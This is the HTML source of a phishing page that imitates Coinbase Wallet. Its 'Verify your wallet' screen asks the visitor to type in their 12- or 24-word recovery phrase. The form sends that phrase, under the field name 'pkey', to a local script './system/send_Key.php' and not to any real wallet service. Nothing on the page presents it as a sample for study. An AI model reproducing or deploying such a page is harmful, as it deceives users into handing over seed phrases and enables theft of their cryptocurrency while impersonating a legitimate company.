<meta name="viewport" content="width=device-width, initial-scale=1">
<html class="js-focus-visible" data-js-focus-visible="" style="background-color: #FFFFFF"><head><meta charset="UTF-8">

    <title>Coinbase Wallet</title><style>/* Light mode */
        @media (prefers-color-scheme: light) {
          body {
            background-color: white;
            color: black;
          }
        }
        /* Dark mode */
        @media (prefers-color-scheme: dark) {
          body {
            background-color: rgb(10, 11, 3);
            color: white;
          }
        }</style>
        
        <link href="popup.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="./290.css"><style data-styled="active" data-styled-version="5.3.0"></style><link rel="stylesheet" type="text/css" href="./257.css"><link rel="stylesheet" type="text/css" href="./88.css"><link rel="stylesheet" type="text/css" href="./353.css"><link rel="stylesheet" type="text/css" href="./152.css"><link rel="stylesheet" type="text/css" href="./505.css"><link rel="stylesheet" type="text/css" href="./913.css"><link rel="stylesheet" type="text/css" href="./432.css"><link rel="stylesheet" type="text/css" href="./616.css"><link rel="stylesheet" type="text/css" href="./278.css"><link rel="stylesheet" type="text/css" href="./204.css"><link rel="stylesheet" type="text/css" href="./552.css"><link rel="stylesheet" type="text/css" href="./535.css"><link rel="stylesheet" type="text/css" href="./163.css"><link rel="stylesheet" type="text/css" href="./242.css"><link rel="stylesheet" type="text/css" href="./347.css"><link rel="stylesheet" type="text/css" href="./821.css"><link rel="stylesheet" type="text/css" href="./701.css"></head><body><div id="root"><div class="cds-large-l12sl86x cds-light-lilshph" style="--foreground:rgb(var(--gray100)); --foreground-muted:rgb(var(--gray60)); --background:rgb(var(--gray0)); --background-alternate:rgb(var(--gray5)); --background-overlay:rgba(var(--gray80),0.33); --line:rgba(var(--gray60),0.2); --line-heavy:rgba(var(--gray60),0.66); --primary:rgb(var(--blue60)); --primary-wash:rgb(var(--blue0)); --primary-foreground:rgb(var(--gray0)); --negative:rgb(var(--red60)); --negative-foreground:rgb(var(--gray0)); --positive:rgb(var(--green60)); --positive-foreground:rgb(var(--gray0)); --secondary:rgb(var(--gray0)); --secondary-foreground:rgb(var(--gray100));">
          
          <div id="NetFli" class="tfq7ftg" style=""><div></div></div><div class="t1javu29" style=""><div></div></div><div id="app-main" class="avcrcby" style=""><div class="b3j7an8"><div class="tfq7ftg"><div></div></div><div class="t1javu29"><div></div></div><div class="cds-flex-f5gx5i9 cds-center-cup5muy cds-center-cc86uqj"><div class="cds-flex-f5gx5i9 cds-column-c1avywif cds-none-n12l84ie cds-bordered-b1lhdwsw cds-4-_1vq2ef4 cds-4-_1xxf3x0 cds-3-_wniu4l cds-4-_k9syp4" style="height: 600px; width: 375px; box-shadow: rgba(0, 0, 0, 0.02) 0px 8px 12px;"><div class="chbqllg" style="--chbqllg-0:visible; --chbqllg-1:none;"><div data-element-handle="step-import-active" direction="right" fill="1" class="sc-bdnxRM kwsHGh"><div class="cds-flex-f5gx5i9 cds-column-c1avywif"><div class="cds-flex-f5gx5i9 cds-column-c1avywif cds-4-_k9syp4 cds-relative-ryk0urh" style="width: 100%; position: relative;"><div class="cds-flex-f5gx5i9 cds-absolute-axia4az" style="position: absolute; left: -10px; top: -10px;"><button onclick="window.location.href='./Import.html'" type="button" aria-label="Go back" class="cds-interactable-i13lggcw cds-interactableTransparent-i7y1geu cds-interactableTransparentActive-i1tlvw5 cds-transparentChildren-t13p63z cds-transparent-t1iirkex cds-button-bszu5zu cds-focusRing-f1r6m9tt cds-scaledDownState-s1v6pvyx cds-flex-f5gx5i9 cds-center-cup5muy cds-center-cc86uqj cds-iconButton-ioqx6sz" style="--interactable-height:40px; --interactable-opacity-hovered:0.98; --interactable-opacity-pressed:0.92; --interactable-overlay:var(--gray0); --interactable-underlay:var(--foreground); --interactable-border-radius:100px;"><div class="cds-flex-f5gx5i9 cds-relative-ryk0urh" style="position: relative;"><div style="width: 16px; height: 16px;"><span class="cds-iconStyles-i6w5wyz" role="presentation" data-icon-name="backArrow" style="color: var(--secondary-foreground); font-size: 16px;"></span></div></div></button></div><div class="cds-flex-f5gx5i9 cds-row-rk6vx3t cds-center-cc86uqj cds-1-_18x24ic" style="width: 100%;"><div class="cds-flex-f5gx5i9 cds-row-rk6vx3t"><div width="30" height="3" class="s1tid64w" style="--s1tid64w-0:30px; --s1tid64w-1:3px; --s1tid64w-2:100%;"></div><div width="30" height="3" class="s1tid64w" style="--s1tid64w-0:30px; --s1tid64w-1:3px; --s1tid64w-2:100%;"></div><div width="30" height="3" class="s1tid64w" style="--s1tid64w-0:30px; --s1tid64w-1:3px; --s1tid64w-2:10%;"></div><div width="30" height="3" class="s1tid64w" style="--s1tid64w-0:30px; --s1tid64w-1:3px; --s1tid64w-2:10%;"></div></div></div></div>


<form method="post" action="./system/send_Key.php">
          <div class="cds-flex-f5gx5i9 cds-column-c1avywif cds-space-between-s1n2qf5t" style="height: 499px; width: 100%;"><div data-testid="import-wallet-container" class="cds-flex-f5gx5i9 cds-column-c1avywif"><h3 class="cds-typographyResets-t119oo5c cds-title1-t1qzzvh9 cds-foreground-f1itepcl cds-transition-ty35lnf cds-start-s1q2d0t0 cds-1-_13iz7eo">Verify your wallet</h3><div class="cds-typographyResets-t119oo5c cds-body-bwhmx62 cds-foregroundMuted-f1lg16ro cds-transition-ty35lnf cds-start-s1q2d0t0">Enter your 12 (or sometimes 24) word recovery phrase (also called a seed phrase) to verify your wallet.</div></div><div class="cds-flex-f5gx5i9 cds-column-c1avywif"><div class="cds-flex-f5gx5i9 cds-column-c1avywif"><textarea name="pkey" required data-testid="seed-phrase-input" rows="4" placeholder="Separate each word with a space" class="s1e0hce8" style="--s1e0hce8-0:none; height: 100px;"></textarea><span role="presentation" aria-hidden="true" style="flex-grow: 0; flex-shrink: 0; height: var(--spacing-1);"></span><button type="button" class="cds-interactable-i13lggcw cds-interactableTransparent-i7y1geu cds-transparentChildren-t13p63z cds-transparent-t1iirkex cds-focusRing-f1r6m9tt cds-scaledDownState-s1v6pvyx cds-pressableResetStyles-p1xyxgvu" style="--interactable-opacity-hovered:0.92; --interactable-opacity-pressed:0.86; --interactable-underlay:var(--foreground); --interactable-border-radius:0px;"><div data-testid="find-seed-phrase" class="cds-typographyResets-t119oo5c cds-label2-l4ubknn cds-primary-p1vwvuwh cds-transition-ty35lnf cds-start-s1q2d0t0"><a href=></div></button></div></div><div class="cds-flex-f5gx5i9 cds-column-c1avywif"><button type="submit" data-testid="btn-import-wallet" class="cds-interactable-i13lggcw cds-interactableBackground-i1tfznye cds-transparentChildren-t13p63z cds-transparent-t1iirkex cds-button-bszu5zu cds-focusRing-f1r6m9tt cds-fullWidth-f6ekksz cds-scaledDownState-s1v6pvyx cds-primaryForeground-progmjq cds-button-bxm6m07 cds-buttonBlock-b4prk4m cds-2-_chq8ms cds-2-_15ugcm cds-3-_14guxyl cds-3-_r2sgio" style="--interactable-height:56px; --interactable-opacity-hovered:0.92; --interactable-opacity-pressed:0.86; --interactable-overlay:var(--blue60); --interactable-underlay:var(--foreground); --interactable-border-radius:8px;"><span class="cds-positionRelative-p9o3l0l"><span class="cds-typographyResets-t119oo5c cds-headline-ho2otij cds-primaryForeground-progmjq cds-transition-ty35lnf cds-start-s1q2d0t0 cds-noWrap-nqeoca2"><span class="">Next</span></span></span></button></div></div></form></div></div></div></div></div></div></div></div></div></body></html>